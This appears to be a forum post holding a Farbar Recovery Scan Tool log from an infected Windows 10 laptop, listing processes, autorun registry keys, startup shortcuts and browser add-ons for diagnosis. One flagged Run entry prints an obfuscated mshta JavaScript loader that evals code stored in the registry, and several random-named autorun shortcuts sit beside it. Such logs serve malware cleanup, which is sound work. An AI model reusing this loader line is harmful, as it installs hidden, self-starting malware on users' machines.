  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2016-10-16 06:22:11.554
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files (x86)\Common Files\Avnex\vcs64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz
Percentage of memory in use: 44%
Total physical RAM: 8122.15 MB
Available physical RAM: 4504.35 MB
Total Virtual: 9402.15 MB
Available Virtual: 5289.18 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:907.42 GB) (Free:484.27 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:22.23 GB) (Free:2.5 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

==================== End of Addition.txt ============================

Link to post
Share on other sites

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016

Ran by banie_000 (administrator) on KYLE-PC (20-10-2016 14:59:12)

Running from C:\Users\Kyle Aniel\Downloads

Loaded Profiles: Kyle Aniel & banie_000 (Available Profiles: Kyle Aniel & Izach Aniel & banie_000 & Guest)

Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)

Internet Explorer Version 11 (Default browser: IE)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe

(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Autodesk Inc.) C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe

(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe

(BlueStack Systems, Inc.) C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe

() C:\Program Files\Gramblr\gramblr.exe

(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hp\HP System Event\HPWMISVC.exe

(Intel Corporation) C:\Windows\System32\ibtsiva.exe

(Verizon) C:\Program Files (x86)\Verizon\IHA_MessageCenter\Bin\Verizon_IHAMessageCenter.exe

(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe

(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe

(McAfee, Inc.) C:\Windows\System32\mfevtps.exe

(McAfee, Inc.) C:\Program Files (x86)\Internet Content Filter\UpdateService.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe

(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe

(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe

(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe

(Sony Corporation) C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe

(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe

(McAfee, Inc.) C:\Windows\System32\mfevtps.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe

(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe

(McAfee, Inc.) C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe

(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe

(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeature.exe

(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe

(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

(Intel Corporation) C:\Windows\System32\igfxEM.exe

(Intel Corporation) C:\Windows\System32\igfxHK.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe

(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe

() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe

(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe

() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe

(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe

(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe

(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe

(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe

(Spotify Ltd) C:\Users\Kyle Aniel\AppData\Roaming\Spotify\SpotifyWebHelper.exe

(McAfee, Inc.) C:\Program Files (x86)\Internet Content Filter\mfp.exe

() C:\Users\Kyle Aniel\Downloads\AirMouse.exe

(Flux Software LLC) C:\Users\Kyle Aniel\AppData\Local\FluxSoftware\Flux\flux.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe

(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe

(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe

(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hp\HP System Event\HPMSGSVC.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.9.829.0\McCSPServiceHost.exe

(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe

(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe

(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe

(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe

(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\CommonBuild\McCBEntAndInstru.exe

(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneVideo_3.6.25071.0_x64__8wekyb3d8bbwe\Video.UI.exe

(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneMusic_3.6.25021.0_x64__8wekyb3d8bbwe\Music.UI.exe

() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.722.10060.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe

(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe

(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_11609.1001.28.0_x64__8wekyb3d8bbwe\WinStore.Mobile.exe

() C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1608.2312.0_x64__8wekyb3d8bbwe\Time.exe

(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe

(Verizon) C:\Program Files (x86)\Verizon\IHA_MessageCenter\Bin\VzDetectAgent.exe

(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe

(Microsoft Corporation) C:\Windows\System32\smartscreen.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

 

 

==================== Registry (Whitelisted) ====================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8505088 2015-07-03] (Realtek Semiconductor)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech, Inc.)

HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)

HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)

HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500936 2015-04-28] (Adobe Systems Incorporated)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954296 2015-12-11] (Synaptics Incorporated)

HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-04-01] (Hewlett-Packard Company)

HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)

HKLM-x32\...\Run: [] => [X]

HKLM-x32\...\Run: [ADSK DLMSession] => C:\Program Files (x86)\Common Files\Autodesk Shared\Autodesk Download Manager\DLMSession.exe [1627032 2014-02-05] (Autodesk, Inc.)

HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [493960 2014-12-04] (Autodesk Inc.)

HKLM-x32\...\Run: [ICF] => C:\Program Files (x86)\Internet Content Filter\mfp.exe [3331408 2013-08-19] (McAfee, Inc.)

HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2000896 2014-04-04] (iSkySoft)

HKLM-x32\...\Run: [PMBVolumeWatcher] => C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe [2669568 2015-04-17] (Sony Corporation)

HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597552 2015-08-04] (Oracle Corporation)

HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [653576 2015-06-29] (Hewlett-Packard Development Company, L.P.)

HKLM\...\RunOnce: [SRS_APO_Install] => C:\WINDOWS\system32\SRSLabs\{176F4E15-8F7C-4833-ADED-81FAE8CCD186}\slInit64.dll [214776 2015-07-03] (SRS Labs, Inc.)

HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Power2GoExpress8] => 0

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Google Update] => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe [107848 2015-04-30] (Google Inc.)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [HP ENVY 7640 series (NET)] => C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe [3483656 2014-08-22] (Hewlett-Packard Development Company, LP)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8591272 2015-11-16] (Piriform Ltd)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [iFunBox] => C:\Program Files (x86)\i-Funbox DevTeam\iFunBox_x64.exe [2783232 2015-07-27] (i-Funbox.com)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [MurGee.com Auto Clicker] => C:\Users\Kyle Aniel\AppData\Roaming\Auto Clicker\AutoClicker.exe [124072 2016-04-20] (MurGee.com)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Spotify Web Helper] => C:\Users\Kyle Aniel\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1555056 2016-08-13] (Spotify Ltd)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Spotify] => C:\Users\Kyle Aniel\AppData\Roaming\Spotify\Spotify.exe [6937200 2016-08-13] (Spotify Ltd)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [Air Mouse Server] => C:\Users\Kyle Aniel\Downloads\AirMouse.exe [202240 2016-10-01] ()

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [f.lux] => C:\Users\Kyle Aniel\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**bquflhx<*>] => "C:\WINDOWS\system32\mshta.exe" javascript:RHY2M="cnlfCDX";P1x=new%20ActiveXObject("WScript.Shell");Bvpcj7n4V="bzjV";mzF9K7=P1x.RegRead("HKCU\\software\\dcyozhn\\eyzxwqjdey");N1QuJVU="T";eval(mzF9K7); (the data entry has 17 more characters). <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**xwhehhqlxw<*>] => "C:\Users\Kyle Aniel\AppData\Local\f70e5\db038.lnk" <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Run: [**ofiy<*>] => "C:\Users\Kyle Aniel\AppData\Local\14ea33ba\15ee12e9.lnk" <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\RunOnce: [Uninstall C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64"

HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8591272 2015-11-16] (Piriform Ltd)

HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4299968 2016-06-22] (Disc Soft Ltd)

HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\Bluestacks\HD-Agent.exe [986648 2016-09-29] (BlueStack Systems, Inc.)

HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2016-07-16] (Microsoft Corporation)

Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0813b25f.lnk [2016-10-20]

Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3509d.lnk [2016-10-20]

Startup: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2015-11-13]

ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)

GroupPolicyUsers\S-1-5-21-23814709-2432651133-2868963390-1010\User: Restriction <======= ATTENTION

GroupPolicyUsers\S-1-5-21-23814709-2432651133-2868963390-1002\User: Restriction <======= ATTENTION

GroupPolicyUsers\S-1-5-21-23814709-2432651133-2868963390-1001\User: Restriction <======= ATTENTION

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

Tcpip\..\Interfaces\{849d57b1-e8c7-4cf9-a689-c5cbbe5b3d71}: [DhcpNameServer] 192.168.48.1

Tcpip\..\Interfaces\{caebb8ce-2c7b-43c1-bdca-7787c2b0f2a1}: [DhcpNameServer] 192.168.1.1

 

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\S-1-5-21-23814709-2432651133-2868963390-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1

HKU\S-1-5-21-23814709-2432651133-2868963390-1010\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\S-1-5-21-23814709-2432651133-2868963390-1010\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1

SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL =

SearchScopes: HKLM-x32 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}

SearchScopes: HKLM-x32 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} URL =

SearchScopes: HKU\.DEFAULT -> DefaultScope {D53E7C40-DA4D-443C-8C6F-A7B1F8CB1299} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011US756D20141101&p={SearchTerms}

SearchScopes: HKU\.DEFAULT -> {D53E7C40-DA4D-443C-8C6F-A7B1F8CB1299} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011US756D20141101&p={SearchTerms}

SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> DefaultScope {94A123C6-6854-4664-8E3F-C438B740C9CC} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US756D20151120&p={searchTerms}

SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}

SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1001 -> {94A123C6-6854-4664-8E3F-C438B740C9CC} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C015US756D20151120&p={searchTerms}

SearchScopes: HKU\S-1-5-21-23814709-2432651133-2868963390-1010 -> {7A114980-B164-4074-B049-DAB2741B7BD5} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}

BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-10-08] (Microsoft Corporation)

BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-10-08] (Microsoft Corporation)

BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)

BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-10-16] (Oracle Corporation)

BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-04-04] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)

BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll [2015-10-16] (Oracle Corporation)

BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)

Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-10-03] (McAfee, Inc.)

Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-10-03] (McAfee, Inc.)

Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)

Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)

Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)

Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)

Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)

Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)

Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [2000-08-08] (Microsoft Corporation)

Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation)

Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation)

Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation)

Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-10-16] (Microsoft Corporation)

Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-10-03] (McAfee, Inc.)

Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-10-03] (McAfee, Inc.)

Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-07-07] (McAfee, Inc.)

Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-07-07] (McAfee, Inc.)

 

FireFox:

========

FF DefaultProfile: n8nht5ff.default

FF ProfilePath: C:\Users\banie_000\AppData\Roaming\Mozilla\Firefox\Profiles\n8nht5ff.default [2016-07-30]

FF SelectedSearchEngine: Mozilla\Firefox\Profiles\n8nht5ff.default -> Search Provided by Bing

FF DefaultSearchEngine: Mozilla\Firefox\Profiles\n8nht5ff.default -> Search Provided by Bing

FF NewTab: Mozilla\Firefox\Profiles\n8nht5ff.default -> about:newtab

FF Keyword.URL: Mozilla\Firefox\Profiles\n8nht5ff.default -> user_pref("keyword.URL", true);

FF Homepage: Mozilla\Firefox\Profiles\n8nht5ff.default -> hxxp://www.bing.com/search?FORM=INCOH1&PC=IC04&PTAG=ICO-f2e8b855

FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2016-10-13]

FF SearchPlugin: C:\Users\banie_000\AppData\Roaming\Mozilla\Firefox\Profiles\n8nht5ff.default\searchplugins\search provided by bing.xml [2016-07-30]

FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi

FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi

FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK

FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2016-08-12] [not signed]

FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-07-11]

FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_185.dll [2016-10-11] ()

FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-07-07] ()

FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-03-09] (Adobe Systems)

FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-11] ()

FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1218158.dll [2015-04-27] (Adobe Systems, Inc.)

FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()

FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2016-08-25] (Google)

